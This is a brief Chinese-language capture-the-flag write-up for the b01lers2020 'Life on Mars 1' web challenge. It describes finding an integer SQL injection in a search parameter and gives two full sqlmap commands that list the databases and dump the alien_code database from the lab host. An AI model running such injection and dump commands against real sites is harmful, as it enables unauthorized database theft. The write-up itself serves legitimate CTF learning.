[b01lers2020]Life on Mars 1

sql注入，信息搜集

打开之后大脑一片空白，不知道入手点在哪，信息什么都查不到，最后抓包抓到了东西

发现抓包的时候出现了两个参数，直接在网页上访问一下

发现爆装备了，在这里我卡了挺久的，最后是看其他师傅的wp发现这里是sql注入，就是一个最基础的整形注入，



确定了之后我们直接上sqlmap

python sqlmap.py -u http://02cf228b-5b04-4c11-8620-7c88de0db19e.node5.buuoj.cn:81/query?search=amazonis_planitia --dbs
爆出库名

python sqlmap.py -u http://02cf228b-5b04-4c11-8620-7c88de0db19e.node5.buuoj.cn:81/query?search=amazonis_planitia -D alien_code --all
爆出数据

得到flag